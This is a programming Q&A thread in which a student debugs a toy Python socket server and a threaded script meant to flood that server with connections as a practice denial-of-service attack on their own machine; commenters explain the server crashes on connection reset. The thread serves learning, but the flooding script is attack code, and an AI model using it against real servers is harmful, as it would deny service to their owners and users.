# Exception in Socket Threading - No connection could be made because the target machine actively refused it

Tags: python, multithreading, sockets, client-server, denial-of-service

I'm trying to simulate a simple DOS attack using sockets in python . In the DOS Script , I use threads to create multiple attacks on the server . But , some threads are being executed and the program just stops in between after a few threads/after a few successive attacks.

I'm getting Errors on both the Server and the DOS attacker and they just stop executing .

Below is my code for the web server :

```
import socket
import os

#from socket import *


def create_server():
    
    server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    
    try:
        server_socket.bind(('--my_ip--',9000))
        server_socket.listen(5)
        
        while(1):
            
            (client_socket , address) = server_socket.accept()
            print('accepted')
            
            data = client_socket.recv(5000).decode()
            parts = data.split('\n')
            
            if(len(parts) > 0):
                print(parts[0])
                
            if(data):
                print(repr(data))
            else:
                print('data not received')
                
            d = "HTTP/1.1 200 OK\r\n"
            d += "Content-Type: text/html; charset=utf-8\r\n"
            d += "\r\n"
            
            d += "<html><body>Hello World</body></html>\r\n\r\n"
            
            client_socket.sendall(d.encode())
            
            client_socket.shutdown(socket.SHUT_RDWR)
            
    except KeyboardInterrupt :
        print('Shutting down')
    #except Exception as exc :
     #   print('Error :')
      #  print(exc)
    
    server_socket.close()
    

print('http://--my_ip--:9000')
create_server()
```

My DOS script using threading :

```
import socket
import threading
import random
import time
import sys

target ='--My IP--'
fake_ip = '123.231.44.22'
port = 9000

msg = bytes(random.getrandbits(10))
duration = 60 # in seconds

timeout = time.time() + duration



def attack():
    
    sent_packets = 0

    while True:
      attack_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      attack_socket.connect(('--my_ip--',port))
      attack_socket.sendto(('GET /' + target + "HTTP/1.1\r\n").encode('ascii'),(target,port))
      #attack_socket.sendto(('HOST :' + fake_ip + "\r\n\r\n").encode('ascii'),(target,port))
      sent_packets += 1
      attack_socket.close()


for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()
```

On the server side , I'm getting the error :

```
http://--my_ip--:9000
accepted
GET /--ip--HTTP/1.1
'GET /--ip--4HTTP/1.1\r\n'
accepted
GET /--ip--HTTP/1.1
'GET /--ip--HTTP/1.1\r\n'
accepted
GET /--ip--HTTP/1.1
'GET /--ip--HTTP/1.1\r\n'
accepted
GET /--ip--HTTP/1.1
'GET /--ip--HTTP/1.1\r\n'
Traceback (most recent call last):

  File "<ipython-input-1-417f30320ecc>", line 1, in <module>
    runfile('D:/Networks/Package/server.py', wdir='D:/Networks/Package')

  File "C:\Users\91887\Anaconda3\lib\site-packages\spyder_kernels\customize\spydercustomize.py", line 827, in runfile
    execfile(filename, namespace)

  File "C:\Users\91887\Anaconda3\lib\site-packages\spyder_kernels\customize\spydercustomize.py", line 110, in execfile
    exec(compile(f.read(), filename, 'exec'), namespace)

  File "D:/Networks/Package/server.py", line 51, in <module>
    create_server()

  File "D:/Networks/Package/server.py", line 39, in create_server
    client_socket.shutdown(socket.SHUT_RDWR)

ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host
```

And , on the DOS side :

```
Exception in thread Thread-88:
Traceback (most recent call last):
  File "C:\Users\91887\Anaconda3\lib\threading.py", line 926, in _bootstrap_inner
    self.run()
  File "C:\Users\91887\Anaconda3\lib\threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "D:/Networks/Package/DOS_script.py", line 24, in attack
    attack_socket.connect(('--my_ip--',port))
ConnectionRefusedError: [WinError 10061] No connection could be made because the target machine actively refused it
Exception in thread Thread-35:
Traceback (most recent call last):
  File "C:\Users\91887\Anaconda3\lib\threading.py", line 926, in _bootstrap_inner
    self.run()
  File "C:\Users\91887\Anaconda3\lib\threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "D:/Networks/Package/DOS_script.py", line 24, in attack
    attack_socket.connect(('--my_ip--',port))
ConnectionRefusedError: [WinError 10061] No connection could be made because the target machine actively refused it

and so on ... for many threads
```

I don't seem to understand what is causing this issue at all . What is wrong with my code ?

Could someone please help me resolve this error so that I'm able to make a DOS attack on my server to crash it ? And , Of course ,  I'm not doing anything illegal.

Comment: Congratulations! You crashed your own server. Technically, crashing the server **is** a DoS attack. Although it's not the kind of DoS attack you were trying to do.

Comment: (And if you were wondering, it's perfectly legal to DoS your own server. Security students are often encouraged to hack their own stuff to see how it works)

Comment: @user253751 Just realized that I crashed my server and it is indeed a DoS attack . But , could you please tell me what you mean by ' Not the kind of DoS attack you were trying to do ' . Am I missing something my code/attack ? I'd be happy to correct mistakes , if any . Thanks.

Comment: Well, I think you were trying to attack your server by overloading it. What you actually did is you attacked it by making it crash. Both of them are DoS (because the server doesn't work any more) but they're completely different kinds of attack.

Comment: @user253751  Thanks . Yeah , I was trying to overload to slow down the server to deny requests but ended up completely crashing it . Although this serves the purpose of DoS , do you have any idea as to what I must do to merely overload the server and not crash it ? Should I avoid threading ?

Comment: You should fix your server. At the moment, your server crashes if the client closes the connection. Make it so that your server doesn't crash if the client closes the connection.

Comment: Okay , I get it . Thanks a lot